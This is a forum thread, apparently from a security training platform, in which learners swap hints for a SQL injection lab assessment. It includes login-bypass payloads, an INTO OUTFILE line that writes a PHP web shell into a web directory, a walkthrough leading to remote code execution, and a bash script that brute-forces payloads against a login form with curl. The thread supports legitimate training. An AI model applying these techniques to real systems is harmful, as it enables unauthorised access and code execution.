Skills Assessment - SQL Injection Fundamentals = Solved

Type your comment> @blueprismo said:

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username
I’ve also filled all the payloads in the repo in the username…

Did you also use comments in the username?

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username

@blueprismo said:

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username
DONE!! YAY

Type your comment> @blueprismo said:

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username

@blueprismo said:

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username
DONE!! YAY

My problem is that I can’t reach the webshell via url

Type your comment> @basti394 said:

Type your comment> @blueprismo said:

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username

@blueprismo said:

@basti394 said:
Type your comment> @blueprismo said:

@basti394 I’m also like you, also crawled and found 2 dirs, tried the payload all the things scripts, no luck…

I got it. My hint: You just have to fill a payload into the username
DONE!! YAY

My problem is that I can’t reach the webshell via url

it’s kinda easy, just think a bit more, a web crawler may help you find the obvious… if u need more help PM me

I’ve bypassed login page, and then got stuck on the writing web shell on the base web directory because of Errcode 13:“Permission denied” , then tried to write my web shell at the dashboard directory and again Errcode13 appeared. I need a little nudge to find the appropriate vector of my attack(probably it is directory, which I don’t know how to enumerate). Or even web shell is already exists on the webapp:) Help plz

Just finished the CTF.Was so fun.
Thank you HTB Academy;

Hi! Don’t want to create another topic.

Could anyone give me a hint about module ‘Using comments’ in SQL Injection fundamentals?

I’ve been trying in many ways, however still I am not able to login to user with id 5 in database.

‘+ 1 Login as the user with the id 5 to get the flag’

Because requirement is to login as a different user right? I am able to login as ‘tom’ or ‘admin’ however they logins are known. How to log in as a specific user when we do not have a name?

hi, can help me somebody, i upload the shell, but , i cant do anything with the shell, maybe she’ll it’s wrong?? hints, thanks

solved

Hey There !
I am also at the Tom Question,

“Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in?”

When i go to the Website with Firefox and use a password Payload such as ‘1’=‘1’ i get to the Admin Panel and it tells me i have successfully logged in.

but there is no Flag

So when i use the Terminal und try to connect with :
mysql -u tom -h Webside -P port -p
and enter the password which includes ‘1’=‘1’ the terminal does nothing and then sends me this Errormessage:

ERROR 2013 (HY000): Lost connection to MySQL server at ‘handshake: reading initial communication packet’, system error: 11

Well … i don´t really know what to do now

Type your comment> @PortaHelle said:

Hey There !
I am also at the Tom Question,

“Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in?”

When i go to the Website with Firefox and use a password Payload such as ‘1’=‘1’ i get to the Admin Panel and it tells me i have successfully logged in.

but there is no Flag

So when i use the Terminal und try to connect with :
mysql -u tom -h Webside -P port -p
and enter the password which includes ‘1’=‘1’ the terminal does nothing and then sends me this Errormessage:

ERROR 2013 (HY000): Lost connection to MySQL server at ‘handshake: reading initial communication packet’, system error: 11

Well … i don´t really know what to do now

Facing the same problem. Please help when you find a solution

Username: tom’ or ‘1’='1 :grinning:

Username: tom’ or ‘1’='1

this exercise is confusing. If you use the OR injection the website responses with “login successfull”. Use the comment injection and the website responses with the flag

how can i log in , give me some nudge

follow the module like try to bypass the AND id>1 with admin’)-- , if you login as admin then follow the hint, try to test OR with condition id=1 and username as user, if you login as admin, try id=5 with user as username

leave the password empty

once you’ve bypassed the login form pay attention to the number of columns and the present working directory when attempting to get remote code execution. for the login by pass hacktricks.com should help. and one last hint… you are all alone. lol

Solved! HINT: upload a shell in correct DIRECTORY

into outfile '/var/www/html/dashboard/shell.php

  • Scan the website to find some file /db.sql
  • You will discover: Password is hashed, and you will have the database structure. Try the password inside will give you nothing on login page.
  • Since above: You will know the only available field for you to hack is username. Try authentication bypass here, it works.
  • Then you’ve logged in. Now try the only input field on the web page. You should now find the column you could control. and then identify the vuln. You could either trigger an error or something else. The error message will show you, this server is MariaDB (MySQL) with PHP. And Response header told you it’s LAMP on a Ubnutu.
  • Now identify the column you could control and do what you’ve learned previously.

That’s all. Hope you enjoy.

There are multiples payloads to bypass the first step, with a simple bash script you can get it, I use these payloads SQL Injection - Payloads All The Things

#!/bin/bash
#
wordlist=payloads
url="http://94.237.49.11:52572"

while IFS= read -r payload; do
    echo -ne "\rTrying: $payload"
    tput el 
    curl -s -i "$url" -d "username=$payload" -d "password=test"| grep -q "Incorrect" || { echo -e "\n [*] Correct payload is: $payload\n"; }

done < "$wordlist"